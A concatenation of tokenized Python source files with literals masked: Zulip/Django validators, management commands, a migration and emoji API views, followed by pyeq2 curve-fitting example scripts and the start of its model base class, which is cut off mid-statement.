<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import six <EOL> def check_string ( var_name , val ) : <EOL> if not isinstance ( val , six . string_types ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return None <EOL> def check_int ( var_name , val ) : <EOL> if not isinstance ( val , int ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return None <EOL> def check_bool ( var_name , val ) : <EOL> if not isinstance ( val , bool ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return None <EOL> def check_none_or ( sub_validator ) : <EOL> def f ( var_name , val ) : <EOL> if val is None : <EOL> return None <EOL> else : <EOL> return sub_validator ( var_name , val ) <EOL> return f <EOL> def check_list ( sub_validator , length = None ) : <EOL> def f ( var_name , val ) : <EOL> if not isinstance ( val , list ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> if length is not None and length != len ( val ) : <EOL> return '<STR_LIT>' % ( var_name , length ) <EOL> if sub_validator : <EOL> for i , item in enumerate ( val ) : <EOL> vname = '<STR_LIT>' % ( var_name , i ) <EOL> error = sub_validator ( vname , item ) <EOL> if error : <EOL> return error <EOL> return None <EOL> return f <EOL> def check_dict ( required_keys ) : <EOL> def f ( var_name , val ) : <EOL> if not isinstance ( val , dict ) : <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> for k , sub_validator in required_keys : <EOL> if k not in val : <EOL> return '<STR_LIT>' % ( k , var_name ) <EOL> vname = '<STR_LIT>' % ( var_name , k ) <EOL> error = sub_validator ( vname , val [ k ] ) <EOL> if error : <EOL> return error <EOL> return None <EOL> return f <EOL> def check_variable_type ( allowed_type_funcs ) : <EOL> """<STR_LIT>""" <EOL> def enumerated_type_check ( var_name , val ) : <EOL> for func in allowed_type_funcs : <EOL> if not func ( var_name , val ) : <EOL> return None <EOL> return '<STR_LIT>' % ( var_name , ) <EOL> return enumerated_type_check <EOL> def equals ( expected_val ) : <EOL> def f ( var_name , val ) : <EOL> if val != expected_val : <EOL> return '<STR_LIT>' % ( var_name , expected_val , val ) <EOL> return None <EOL> return f </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from django . core . management . base import BaseCommand <EOL> from django . core . management import CommandError <EOL> from zerver . lib . queue import SimpleQueueClient <EOL> class Command ( BaseCommand ) : <EOL> def add_arguments ( self , parser ) : <EOL> parser . add_argument ( '<STR_LIT>' , metavar = '<STR_LIT>' , type = str , <EOL> help = "<STR_LIT>" ) <EOL> help = "<STR_LIT>" <EOL> def handle ( self , * args , ** options ) : <EOL> queue_name = options [ '<STR_LIT>' ] <EOL> queue = SimpleQueueClient ( ) <EOL> queue . ensure_queue ( queue_name , lambda : None ) <EOL> queue . channel . queue_purge ( queue_name ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RunSQL ( "<STR_LIT>" , <EOL> reverse_sql = "<STR_LIT>" ) , <EOL> ] </s>
<s> from django . core . exceptions import ValidationError <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> from zerver . lib . response import json_success , json_error <EOL> from zerver . lib . actions import check_add_realm_emoji , do_remove_realm_emoji <EOL> from zerver . lib . rest import rest_dispatch as _rest_dispatch <EOL> rest_dispatch = csrf_exempt ( ( lambda request , * args , ** kwargs : _rest_dispatch ( request , globals ( ) , * args , ** kwargs ) ) ) <EOL> def list_emoji ( request , user_profile ) : <EOL> return json_success ( { '<STR_LIT>' : user_profile . realm . get_emoji ( ) } ) <EOL> def upload_emoji ( request , user_profile ) : <EOL> emoji_name = request . POST . get ( '<STR_LIT:name>' , None ) <EOL> emoji_url = request . POST . get ( '<STR_LIT:url>' , None ) <EOL> try : <EOL> check_add_realm_emoji ( user_profile . realm , emoji_name , emoji_url ) <EOL> except ValidationError as e : <EOL> return json_error ( e . message_dict ) <EOL> return json_success ( ) <EOL> def delete_emoji ( request , user_profile , emoji_name ) : <EOL> do_remove_realm_emoji ( user_profile . realm , emoji_name ) <EOL> return json_success ( { } ) </s>
<s> from __future__ import absolute_import <EOL> from django . core . management . base import BaseCommand <EOL> from zerver . models import Subscription <EOL> class Command ( BaseCommand ) : <EOL> help = """<STR_LIT>""" <EOL> def handle ( self , * args , ** options ) : <EOL> for subscription in Subscription . objects . all ( ) : <EOL> subscription . desktop_notifications = subscription . notifications <EOL> subscription . audible_notifications = subscription . notifications <EOL> subscription . save ( update_fields = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> from __future__ import generators <EOL> import os , sys , inspect , copy <EOL> if - <NUM_LIT:1> != sys . path [ <NUM_LIT:0> ] . find ( '<STR_LIT>' ) : raise Exception ( '<STR_LIT>' ) <EOL> exampleFileDirectory = sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] <EOL> pyeq2IimportDirectory = os . path . join ( os . path . join ( exampleFileDirectory , '<STR_LIT:..>' ) , '<STR_LIT:..>' ) <EOL> if pyeq2IimportDirectory not in sys . path : <EOL> sys . path . append ( pyeq2IimportDirectory ) <EOL> import pyeq2 <EOL> def UniqueCombinations ( items , n ) : <EOL> if n == <NUM_LIT:0> : <EOL> yield [ ] <EOL> else : <EOL> for i in xrange ( len ( items ) ) : <EOL> for cc in UniqueCombinations ( items [ i + <NUM_LIT:1> : ] , n - <NUM_LIT:1> ) : <EOL> yield [ items [ i ] ] + cc <EOL> def UniqueCombinations2 ( items2 , n2 ) : <EOL> if n2 == <NUM_LIT:0> : <EOL> yield [ ] <EOL> else : <EOL> for i2 in xrange ( len ( items2 ) ) : <EOL> for cc2 in UniqueCombinations2 ( items2 [ i2 + <NUM_LIT:1> : ] , n2 - <NUM_LIT:1> ) : <EOL> yield [ items2 [ i2 ] ] + cc2 <EOL> def SetParametersAndFit ( inEquation , resultList , inPrintStatus ) : <EOL> try : <EOL> if len ( inEquation . GetCoefficientDesignators ( ) ) > len ( inEquation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> return <EOL> if inEquation . ShouldDataBeRejected ( inEquation ) : <EOL> return <EOL> if inPrintStatus : <EOL> print ( '<STR_LIT>' , inEquation . __module__ , "<STR_LIT:'>" + inEquation . GetDisplayName ( ) + "<STR_LIT:'>" ) <EOL> inEquation . Solve ( ) <EOL> target = inEquation . CalculateAllDataFittingTarget ( inEquation . solvedCoefficients ) <EOL> if target > <NUM_LIT> : <EOL> return <EOL> except : <EOL> print ( "<STR_LIT>" + inEquation . __class__ . __name__ + '<STR_LIT:\n>' + str ( sys . exc_info ( ) [ <NUM_LIT:0> ] ) + '<STR_LIT:\n>' + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) + '<STR_LIT:\n>' ) <EOL> return None <EOL> t0 = copy . deepcopy ( inEquation . __module__ ) <EOL> t1 = copy . deepcopy ( inEquation . __class__ . __name__ ) <EOL> t2 = copy . deepcopy ( inEquation . extendedVersionHandler . __class__ . __name__ . split ( '<STR_LIT:_>' ) [ <NUM_LIT:1> ] ) <EOL> t3 = copy . deepcopy ( target ) <EOL> t4 = copy . deepcopy ( inEquation . solvedCoefficients ) <EOL> t5 = copy . deepcopy ( inEquation . polyfunctional2DFlags ) <EOL> t6 = copy . deepcopy ( inEquation . xPolynomialOrder ) <EOL> t7 = copy . deepcopy ( inEquation . rationalNumeratorFlags ) <EOL> t8 = copy . deepcopy ( inEquation . rationalDenominatorFlags ) <EOL> resultList . append ( [ t0 , t1 , t2 , t3 , t4 , t5 , t6 , t7 , t8 ] ) <EOL> rawData = '''<STR_LIT>''' <EOL> resultList = [ ] <EOL> fittingTargetText = '<STR_LIT>' <EOL> externalCache = pyeq2 . dataCache ( ) <EOL> reducedDataCache = { } <EOL> smoothnessControl = <NUM_LIT:3> <EOL> for submodule in inspect . getmembers ( pyeq2 . Models_2D ) : <EOL> if inspect . ismodule ( submodule [ <NUM_LIT:1> ] ) : <EOL> for equationClass in inspect . getmembers ( submodule [ <NUM_LIT:1> ] ) : <EOL> if inspect . isclass ( equationClass [ <NUM_LIT:1> ] ) : <EOL> if equationClass [ <NUM_LIT:1> ] . splineFlag or equationClass [ <NUM_LIT:1> ] . userSelectablePolynomialFlag or equationClass [ <NUM_LIT:1> ] . userCustomizablePolynomialFlag or equationClass [ <NUM_LIT:1> ] . userSelectablePolyfunctionalFlag or equationClass [ <NUM_LIT:1> ] . userSelectableRationalFlag or equationClass [ <NUM_LIT:1> ] . userDefinedFunctionFlag : <EOL> continue <EOL> for extendedVersion in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if ( extendedVersion == '<STR_LIT>' ) and ( equationClass [ <NUM_LIT:1> ] . autoGenerateOffsetForm == False ) : <EOL> continue <EOL> equationInstance = equationClass [ <NUM_LIT:1> ] ( fittingTargetText , extendedVersion ) <EOL> if len ( equationInstance . GetCoefficientDesignators ( ) ) > smoothnessControl : <EOL> continue <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , True ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> equationCount = <NUM_LIT:0> <EOL> maxPolyfunctionalCoefficients = <NUM_LIT:4> <EOL> polyfunctionalEquationList = pyeq2 . PolyFunctions . GenerateListForPolyfunctionals_2D ( ) <EOL> functionIndexList = range ( len ( polyfunctionalEquationList ) ) <EOL> for coeffCount in range ( <NUM_LIT:1> , maxPolyfunctionalCoefficients + <NUM_LIT:1> ) : <EOL> functionCombinations = UniqueCombinations ( functionIndexList , coeffCount ) <EOL> for functionCombination in functionCombinations : <EOL> if len ( functionCombination ) > smoothnessControl : <EOL> continue <EOL> equationInstance = pyeq2 . Models_2D . Polyfunctional . UserSelectablePolyfunctional ( fittingTargetText , '<STR_LIT>' , functionCombination , polyfunctionalEquationList ) <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , False ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> equationCount += <NUM_LIT:1> <EOL> if ( equationCount % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> print ( '<STR_LIT:U+0020>' , equationCount , '<STR_LIT>' ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> maxPolynomialOrderX = <NUM_LIT:5> <EOL> for polynomialOrderX in range ( maxPolynomialOrderX + <NUM_LIT:1> ) : <EOL> if ( polynomialOrderX + <NUM_LIT:1> ) > smoothnessControl : <EOL> continue <EOL> equationInstance = pyeq2 . Models_2D . Polynomial . UserSelectablePolynomial ( fittingTargetText , '<STR_LIT>' , polynomialOrderX ) <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , False ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> ( ) <EOL> print ( '<STR_LIT>' ) <EOL> equationCount = <NUM_LIT:0> <EOL> maxCoeffs = <NUM_LIT:3> <EOL> functionList = pyeq2 . PolyFunctions . GenerateListForRationals_2D ( ) <EOL> functionIndexList = range ( len ( functionList ) ) <EOL> for numeratorCoeffCount in range ( <NUM_LIT:1> , maxCoeffs ) : <EOL> numeratorComboList = UniqueCombinations ( functionIndexList , numeratorCoeffCount ) <EOL> for numeratorCombo in numeratorComboList : <EOL> for denominatorCoeffCount in range ( <NUM_LIT:1> , maxCoeffs ) : <EOL> denominatorComboList = UniqueCombinations2 ( functionIndexList , denominatorCoeffCount ) <EOL> for denominatorCombo in denominatorComboList : <EOL> for extendedVersion in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> extraCoeffs = <NUM_LIT:0> <EOL> if extendedVersion == '<STR_LIT>' : <EOL> extraCoeffs = <NUM_LIT:1> <EOL> if ( len ( numeratorCombo ) + len ( denominatorCombo ) + extraCoeffs ) > smoothnessControl : <EOL> continue <EOL> equationInstance = pyeq2 . Models_2D . Rational . UserSelectableRational ( fittingTargetText , extendedVersion , numeratorCombo , denominatorCombo , functionList ) <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , False ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> equationCount += <NUM_LIT:1> <EOL> if ( equationCount % <NUM_LIT:5> ) == <NUM_LIT:0> : <EOL> print ( '<STR_LIT:U+0020>' , equationCount , '<STR_LIT>' , equationInstance . rationalNumeratorFlags , equationInstance . rationalDenominatorFlags , ) <EOL> if extendedVersion == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( ) <EOL> resultList . sort ( key = lambda item : item [ <NUM_LIT:3> ] ) <EOL> bestResult = resultList [ <NUM_LIT:0> ] <EOL> print ( ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' + str ( smoothnessControl ) + '<STR_LIT>' ) <EOL> moduleName = bestResult [ <NUM_LIT:0> ] <EOL> className = bestResult [ <NUM_LIT:1> ] <EOL> extendedVersionHandlerName = bestResult [ <NUM_LIT:2> ] <EOL> fittingTarget = bestResult [ <NUM_LIT:3> ] <EOL> solvedCoefficients = bestResult [ <NUM_LIT:4> ] <EOL> polyfunctional2DFlags = bestResult [ <NUM_LIT:5> ] <EOL> polynomialOrderX = bestResult [ <NUM_LIT:6> ] <EOL> rationalNumeratorFlags = bestResult [ <NUM_LIT:7> ] <EOL> rationalDenominatorFlags = bestResult [ <NUM_LIT:8> ] <EOL> if polyfunctional2DFlags : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" + str ( polyfunctional2DFlags ) + "<STR_LIT:)>" ) <EOL> elif polynomialOrderX != None : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" + str ( polynomialOrderX ) + "<STR_LIT:U+002CU+0020>" + str ( polynomialOrderY ) + "<STR_LIT:)>" ) <EOL> elif rationalNumeratorFlags and rationalDenominatorFlags : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" + str ( rationalNumeratorFlags ) + "<STR_LIT:U+002CU+0020>" + str ( rationalDenominatorFlags ) + "<STR_LIT:)>" ) <EOL> else : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" ) <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equation , False ) <EOL> equation . fittingTarget = fittingTargetText <EOL> equation . solvedCoefficients = solvedCoefficients <EOL> equation . dataCache . FindOrCreateAllDataCache ( equation ) <EOL> equation . CalculateModelErrors ( equation . solvedCoefficients , equation . dataCache . allDataCacheDictionary ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' , moduleName + "<STR_LIT:.>" + className ) <EOL> print ( '<STR_LIT>' , equation . fittingTarget + "<STR_LIT::>" , equation . CalculateAllDataFittingTarget ( equation . solvedCoefficients ) ) <EOL> if polyfunctional2DFlags : <EOL> print ( ) <EOL> print ( '<STR_LIT>' , polyfunctional2DFlags ) <EOL> print ( ) <EOL> if polynomialOrderX != None : <EOL> ( ) <EOL> print ( '<STR_LIT>' , polynomialOrderX ) <EOL> print ( ) <EOL> if rationalNumeratorFlags and rationalDenominatorFlags : <EOL> print ( ) <EOL> print ( '<STR_LIT>' , rationalNumeratorFlags ) <EOL> print ( '<STR_LIT>' , rationalDenominatorFlags ) <EOL> if extendedVersionHandlerName == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' ) <EOL> print ( ) <EOL> for i in range ( len ( equation . solvedCoefficients ) ) : <EOL> print ( "<STR_LIT>" + equation . GetCoefficientDesignators ( ) [ i ] + "<STR_LIT>" + str ( equation . solvedCoefficients [ i ] ) ) <EOL> print ( ) <EOL> for i in range ( len ( equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) : <EOL> print ( '<STR_LIT>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ i ] , ) <EOL> print ( '<STR_LIT:Y>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPredictions [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelAbsoluteError [ i ] , ) <EOL> if not equation . dataCache . DependentDataContainsZeroFlag : <EOL> print ( '<STR_LIT>' , equation . modelRelativeError [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPercentError [ i ] ) <EOL> else : <EOL> print ( ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> import os , sys , inspect <EOL> if - <NUM_LIT:1> != sys . path [ <NUM_LIT:0> ] . find ( '<STR_LIT>' ) : raise Exception ( '<STR_LIT>' ) <EOL> importDir = os . path . join ( os . path . join ( sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] , '<STR_LIT:..>' ) , '<STR_LIT:..>' ) <EOL> if importDir not in sys . path : <EOL> sys . path . append ( importDir ) <EOL> import pyeq2 <EOL> equation = pyeq2 . Models_2D . BioScience . HyperbolicLogistic ( ) <EOL> data = equation . exampleData <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( data , equation , False ) <EOL> equation . Solve ( ) <EOL> print ( "<STR_LIT>" , equation . GetDisplayName ( ) , str ( equation . GetDimensionality ( ) ) + "<STR_LIT:D>" ) <EOL> print ( "<STR_LIT>" , equation . fittingTargetDictionary [ equation . fittingTarget ] , '<STR_LIT:=>' , equation . CalculateAllDataFittingTarget ( equation . solvedCoefficients ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i in range ( len ( equation . solvedCoefficients ) ) : <EOL> print ( "<STR_LIT>" % ( equation . GetCoefficientDesignators ( ) [ i ] , equation . solvedCoefficients [ i ] ) ) <EOL> equation . CalculateModelErrors ( equation . solvedCoefficients , equation . dataCache . allDataCacheDictionary ) <EOL> print ( ) <EOL> for i in range ( len ( equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) : <EOL> print ( '<STR_LIT>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPredictions [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelAbsoluteError [ i ] , ) <EOL> if not equation . dataCache . DependentDataContainsZeroFlag : <EOL> print ( '<STR_LIT>' , equation . modelRelativeError [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPercentError [ i ] ) <EOL> else : <EOL> print ( ) <EOL> print ( ) <EOL> equation . CalculateCoefficientAndFitStatistics ( ) <EOL> if equation . upperCoefficientBounds or equation . lowerCoefficientBounds : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' , equation . df_e ) <EOL> print ( '<STR_LIT>' , equation . df_r ) <EOL> if equation . rmse == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . rmse ) <EOL> if equation . r2 == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . r2 ) <EOL> if equation . r2adj == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . r2adj ) <EOL> if equation . Fstat == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . Fstat ) <EOL> if equation . Fpv == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . Fpv ) <EOL> if equation . ll == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . ll ) <EOL> if equation . aic == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . aic ) <EOL> if equation . bic == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . bic ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> for i in range ( len ( equation . solvedCoefficients ) ) : <EOL> if equation . tstat_beta == None : <EOL> tstat = '<STR_LIT>' <EOL> else : <EOL> tstat = '<STR_LIT>' % ( equation . tstat_beta [ i ] ) <EOL> if equation . pstat_beta == None : <EOL> pstat = '<STR_LIT>' <EOL> else : <EOL> pstat = '<STR_LIT>' % ( equation . pstat_beta [ i ] ) <EOL> if equation . sd_beta != None : <EOL> print ( "<STR_LIT>" % ( equation . GetCoefficientDesignators ( ) [ i ] , equation . solvedCoefficients [ i ] , equation . sd_beta [ i ] ) ) <EOL> else : <EOL> print ( "<STR_LIT>" % ( equation . GetCoefficientDesignators ( ) [ i ] , equation . solvedCoefficients [ i ] ) ) <EOL> print ( "<STR_LIT>" % ( tstat , pstat , equation . ci [ i ] [ <NUM_LIT:0> ] , equation . ci [ i ] [ <NUM_LIT:1> ] ) ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> for i in equation . cov_beta : <EOL> print ( i ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( pyeq2 . outputSourceCodeService ( ) . GetOutputSourceCodeJAVA ( equation ) ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> import pyeq2 <EOL> import numpy <EOL> try : <EOL> import scipy . interpolate , scipy . stats <EOL> except : <EOL> pass <EOL> numpy . seterr ( all = '<STR_LIT:ignore>' ) <EOL> class IModel ( object ) : <EOL> splineFlag = False <EOL> userSelectablePolynomialFlag = False <EOL> userCustomizablePolynomialFlag = False <EOL> userSelectablePolyfunctionalFlag = False <EOL> userSelectableRationalFlag = False <EOL> userDefinedFunctionFlag = False <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> independentData1CannotContainBothPositiveAndNegativeFlag = False <EOL> independentData2CannotContainBothPositiveAndNegativeFlag = False <EOL> listOfAdditionalCoefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:m>' , '<STR_LIT:n>' , '<STR_LIT:p>' , '<STR_LIT:q>' , '<STR_LIT:r>' , '<STR_LIT:s>' , '<STR_LIT:t>' , '<STR_LIT:u>' , '<STR_LIT:v>' , '<STR_LIT:w>' , '<STR_LIT:z>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fittingTargetDictionary = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def __init__ ( self , inFittingTarget = '<STR_LIT>' , inExtendedVersionName = '<STR_LIT>' ) : <EOL> if inExtendedVersionName == '<STR_LIT>' : <EOL> inExtendedVersionName = '<STR_LIT>' <EOL> if inFittingTarget not in list ( self . fittingTargetDictionary . keys ( ) ) : <EOL> raise Exception ( str ( inFittingTarget ) + '<STR_LIT>' ) <EOL> self . fittingTarget = inFittingTarget <EOL> inExtendedVersionName = inExtendedVersionName . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> if inExtendedVersionName not in pyeq2 . ExtendedVersionHandlers . extendedVersionHandlerNameList : <EOL> raise Exception ( inExtendedVersionName + '<STR_LIT>' ) <EOL> allowedExtendedVersion = True <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateOffsetForm == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateReciprocalForm == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateInverseForms == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateGrowthAndDecayForms == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateGrowthAndDecayForms == False ) : <EOL> allowedExtendedVersion = False <EOL> if allowedExtendedVersion == False : <EOL> raise Exception ( '<STR_LIT>' + inExtendedVersionName + '<STR_LIT>' ) <EOL> self . extendedVersionHandler = eval ( '<STR_LIT>' + inExtendedVersionName + '<STR_LIT>' + inExtendedVersionName + '<STR_LIT>' ) <EOL> self . dataCache = pyeq2 . dataCache ( ) <EOL> self . upperCoefficientBounds = [ ] <EOL> self . lowerCoefficientBounds = [ ] <EOL> self . estimatedCoefficients = [ ] <EOL> self . fixedCoefficients = [ ] <EOL> self . solvedCoefficients = [ ] <EOL> self . polyfunctional2DFlags = [ ] <EOL> self . polyfunctional3DFlags = [ ] <EOL> self . xPolynomialOrder = None <EOL> self . yPolynomialOrder = None <EOL> self . rationalNumeratorFlags = [ ] <EOL> self . rationalDenominatorFlags = [ ] <EOL> self . deEstimatedCoefficients = [ ] <EOL> try : <EOL> if self . _dimensionality == <NUM_LIT:2> : <EOL> self . exampleData = '''<STR_LIT>''' <EOL> else : <EOL> self 